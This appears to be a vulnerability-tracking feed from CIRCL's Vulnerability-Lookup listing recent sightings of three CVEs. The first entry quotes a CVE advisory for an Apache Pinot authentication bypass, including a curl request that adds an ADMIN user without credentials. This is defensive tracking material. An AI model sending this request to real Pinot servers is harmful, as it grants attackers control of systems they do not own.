Most recent sightings.

https://vulnerability.circl.lu/sightings/feed Most recent sightings. 2026-05-06T22:50:07.864313+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent sightings. https://vulnerability.circl.lu/sighting/81c2a461-a786-4c8a-b3ff-76797cc36071/export 81c2a461-a786-4c8a-b3ff-76797cc36071 2026-05-06T22:50:08.051521+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "81c2a461-a786-4c8a-b3ff-76797cc36071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "published-proof-of-concept", "source": "https://t.me/cvedetector/21746", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-56325 - Apache Pinot Authentication Bypass\", \n \"Content\": \"CVE ID : CVE-2024-56325 \nPublished : April 1, 2025, 9:15 a.m. | 2\u00a0hours, 12\u00a0minutes ago \nDescription : Authentication Bypass Issue \n \nIf the path does not contain / and contain., authentication is not required. \n \nExpected Normal Request and Response Example \n \ncurl -X POST -H \"Content-Type: application/json\" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users \n \n \nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"} \n \n \nMalicious Request and Response Example \n \ncurl -X POST -H \"Content-Type: application/json\" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . \n \n \nReturn: {\"users\":{}} \n \n \n \n \n \nA new user gets added bypassing authentication, enabling the user to control Pinot. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"01 Apr 2025\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-04-01T13:37:52.000000Z"} 2025-04-01T13:37:52+00:00 https://vulnerability.circl.lu/sighting/275142f2-e952-4d74-b6f8-e654b030b37d/export 275142f2-e952-4d74-b6f8-e654b030b37d 2026-05-06T22:50:08.051424+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "275142f2-e952-4d74-b6f8-e654b030b37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2024/CVE-2024-56325.yaml", "content": "", "creation_timestamp": "2025-04-03T13:16:13.000000Z"} 2025-04-03T13:16:13+00:00 https://vulnerability.circl.lu/sighting/29ac1eb7-2b88-41a1-8efc-f015a6aa32e8/export 29ac1eb7-2b88-41a1-8efc-f015a6aa32e8 2026-05-06T22:50:08.051338+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "29ac1eb7-2b88-41a1-8efc-f015a6aa32e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llzctfed6c2p", "content": "", "creation_timestamp": "2025-04-04T21:02:08.920503Z"} 2025-04-04T21:02:08.920503+00:00 https://vulnerability.circl.lu/sighting/94efbc0d-c553-48db-ae2f-2a8618c262d8/export 94efbc0d-c553-48db-ae2f-2a8618c262d8 2026-05-06T22:50:08.051262+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "94efbc0d-c553-48db-ae2f-2a8618c262d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmif532gvs2p", "content": "", "creation_timestamp": "2025-04-10T20:53:12.140118Z"} 2025-04-10T20:53:12.140118+00:00 https://vulnerability.circl.lu/sighting/a3537656-601a-4f5b-af48-b26dd41d6919/export a3537656-601a-4f5b-af48-b26dd41d6919 2026-05-06T22:50:08.051164+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "a3537656-601a-4f5b-af48-b26dd41d6919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56325", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lmlupxwjxk24", "content": "", "creation_timestamp": "2025-04-12T06:10:15.134152Z"} 2025-04-12T06:10:15.134152+00:00 https://vulnerability.circl.lu/sighting/e11788f7-7e40-491f-92e6-c9e89baf2fe7/export e11788f7-7e40-491f-92e6-c9e89baf2fe7 2026-05-06T22:50:08.051070+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "e11788f7-7e40-491f-92e6-c9e89baf2fe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "MISP/9ca82492-7deb-4197-a6f1-191e121eef96", "content": "", "creation_timestamp": "2025-08-25T13:32:04.000000Z"} 2025-08-25T13:32:04+00:00 https://vulnerability.circl.lu/sighting/9ae58492-33e4-4735-8221-272e0eb51f81/export 9ae58492-33e4-4735-8221-272e0eb51f81 2026-05-06T22:50:08.050975+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "9ae58492-33e4-4735-8221-272e0eb51f81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "MISP/acd0294c-4561-4286-a04e-5c02a1c67b1f", "content": "", "creation_timestamp": "2025-09-15T13:28:31.000000Z"} 2025-09-15T13:28:31+00:00 https://vulnerability.circl.lu/sighting/71516f29-ed4a-42a3-beac-d82e36da6fce/export 71516f29-ed4a-42a3-beac-d82e36da6fce 2026-05-06T22:50:08.050857+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "71516f29-ed4a-42a3-beac-d82e36da6fce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56327", "type": "seen", "source": "MISP/acd0294c-4561-4286-a04e-5c02a1c67b1f", "content": "", "creation_timestamp": "2025-09-16T03:45:00.000000Z"} 2025-09-16T03:45:00+00:00 https://vulnerability.circl.lu/sighting/b642f794-db2c-4da8-98c5-cdd30ec0c7f3/export b642f794-db2c-4da8-98c5-cdd30ec0c7f3 2026-05-06T22:50:08.049468+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "b642f794-db2c-4da8-98c5-cdd30ec0c7f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3m6mmbvm3sc2c", "content": "", "creation_timestamp": "2025-11-27T14:45:18.433016Z"} 2025-11-27T14:45:18.433016+00:00 https://vulnerability.circl.lu/sighting/32019c12-89b3-414a-bc15-c85496230203/export 32019c12-89b3-414a-bc15-c85496230203 2026-05-06T22:50:08.046536+00:00 Joseph Lee http://vulnerability.circl.lu/user/syspect {"uuid": "32019c12-89b3-414a-bc15-c85496230203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-56326", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"} 2026-03-19T00:00:00+00:00